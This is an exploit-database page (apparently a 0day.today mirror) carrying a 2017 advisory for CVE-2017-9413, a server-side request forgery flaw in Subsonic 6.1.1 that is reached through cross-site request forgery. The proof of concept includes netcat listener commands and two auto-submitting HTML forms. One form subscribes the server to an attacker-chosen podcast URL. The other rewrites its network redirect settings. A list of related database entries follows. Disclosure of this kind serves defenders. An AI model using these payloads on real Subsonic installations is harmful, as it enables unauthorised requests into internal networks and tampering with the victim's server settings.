Lucene search
Hyp3rlinx1337DAY-ID-27891HistoryJun 05, 2017 - 12:00 a.m.
Subsonic 6.1.1 - Server-Side Request Forgery Vulnerability
2017-06-0500:00:00
hyp3rlinx
0day.today
47
EPSS
0.003
Percentile
71.6%
Exploit for windows platform in category web applications
[+] Credits: John Page a.k.a hyp3rlinx
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
==================================
CSRF - Server Side Request Forgery
CVE Reference:
==============
CVE-2017-9413
Security Issue:
================
Remote attackers can abuse the Podcast feature of subsonic to launch Server Side Request Forgery attacks on the internal network
or to the internet if an authenticated user clicks a malicious link or visits an attacker controlled webpage. SSRF can be used to
bypass Firewall restriction on LAN.
e.g
nc.exe -llvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_45
Host: 127.0.0.1:1337
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Exploit/POC:
=============
nc.exe -llvp 1337
listening on [any] 1337 ...
1) Subscribe to Podcast CSRF Persistent SSRF
<form method="post" action="http://localhost:4040/podcastReceiverAdmin.view?">
<input type="text" name="add" value="http://127.0.0.1:1337">
<input type="submit" value="OK">
<script>document.forms[0].submit()</script>
</form>
nc.exe -llvp 5555
listening on [any] 5555 ...
2) Interet Radio Settings CSRF Persistent SSRF
<form action="http://localhost:4040/networkSettings.view" method="post">
<input name="portForwardingEnabled" type="hidden" value="true"/>
<input type="hidden" name="_portForwardingEnabled" value="on"/>
<input name="urlRedirectionEnabled" type="hidden" value="true" />
<input type="hidden" name="_urlRedirectionEnabled" value="on"/>
<input name="urlRedirectType" type="radio" value="NORMAL"/>
<input name="urlRedirectFrom" type="radio" value="yourname"/>
<input name="urlRedirectType" type="radio" value="CUSTOM" checked="true" />
<input name="urlRedirectCustomUrl" type="hidden" value="http://127.0.0.1:5555"/>
<script>document.forms[0].submit()</script>
</form>
# 0day.today [2018-02-18] #Related
exploitpack
exploitpack
Subsonic 6.1.1 - Server-Side Request Forgery
2017-06-05 00:00:00
prion
prion
Cross site request forgery (csrf)
2017-07-25 18:29:00
exploitdb
exploitdb
Subsonic 6.1.1 - Server-Side Request Forgery
2017-06-05 00:00:00
cvelist
cvelist
CVE-2017-9413
2017-07-25 18:00:00
nvd
nvd
CVE-2017-9413
2017-07-25 18:29:01
cve
cve
CVE-2017-9413
2017-07-25 18:29:01
packetstorm
packetstorm
Subsonic 6.1.1 Server Side Request Forgery
2017-06-03 00:00:00